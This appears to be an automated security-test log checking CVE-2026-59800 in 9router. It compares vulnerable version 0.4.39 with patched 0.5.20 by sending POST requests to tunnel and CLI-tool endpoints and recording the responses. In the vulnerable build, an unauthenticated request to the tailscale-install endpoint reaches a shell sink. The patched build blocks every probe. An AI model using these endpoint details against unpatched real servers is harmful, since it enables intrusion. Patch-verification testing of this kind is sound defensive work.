[22:08:25] Starting variant/bypass tests for CVE-2026-59800 [22:08:26] Preparing 9router@0.4.39 and patched/latest 9router@0.5.20 under /data/pruva/runs/3ea760f8-bc97-4c4a-bb13-39d93abcf770/bundle/vuln_variant/work [22:08:26] [vuln] starting real 9router server on 127.0.0.1:20380 [22:08:29] [vuln] healthcheck passed [22:08:29] [vuln][c0_parent_install_baseline] POST /api/tunnel/tailscale-install [22:08:34] [vuln][c0_parent_install_baseline] HTTP=200 marker=present response=event: progress data: {"message":"Downloading install script..."} event: progress data: {"message":"Running install script..."} event: progress data: {"messag [22:08:34] [vuln][c0_parent_install_baseline] vulnerable control reached original install shell sink [22:08:34] [vuln][c1_install_trailing_slash] POST /api/tunnel/tailscale-install/ [22:08:34] [vuln][c1_install_trailing_slash] HTTP=308 marker=absent response=/api/tunnel/tailscale-install [22:08:34] [vuln][c2_start_daemon] POST /api/tunnel/tailscale-start-daemon [22:08:38] [vuln][c2_start_daemon] HTTP=200 marker=absent response={"success":true} [22:08:38] [vuln][c3_cli_tools_mitm] POST /api/cli-tools/antigravity-mitm [22:08:38] [vuln][c3_cli_tools_mitm] HTTP=401 marker=absent response={"error":"Unauthorized"} [22:08:39] [fixed] starting real 9router server on 127.0.0.1:20380 [22:08:43] [fixed] healthcheck passed [22:08:43] [fixed][c0_parent_install_baseline] POST /api/tunnel/tailscale-install [22:08:43] [fixed][c0_parent_install_baseline] HTTP=403 marker=absent response={"error":"Local only: CLI token required"} [22:08:43] [fixed][c1_install_trailing_slash] POST /api/tunnel/tailscale-install/ [22:08:43] [fixed][c1_install_trailing_slash] HTTP=308 marker=absent response=/api/tunnel/tailscale-install [22:08:43] [fixed][c2_start_daemon] POST /api/tunnel/tailscale-start-daemon [22:08:43] [fixed][c2_start_daemon] HTTP=401 marker=absent response={"error":"Unauthorized"} [22:08:43] [fixed][c3_cli_tools_mitm] POST /api/cli-tools/antigravity-mitm [22:08:43] [fixed][c3_cli_tools_mitm] HTTP=403 marker=absent response={"error":"Local only: CLI token required"} [22:08:44] RESULT: NO DISTINCT VARIANT/BYPASS - patched/latest target did not execute attacker marker; adjacent candidates were blocked or did not reach the original shell sink.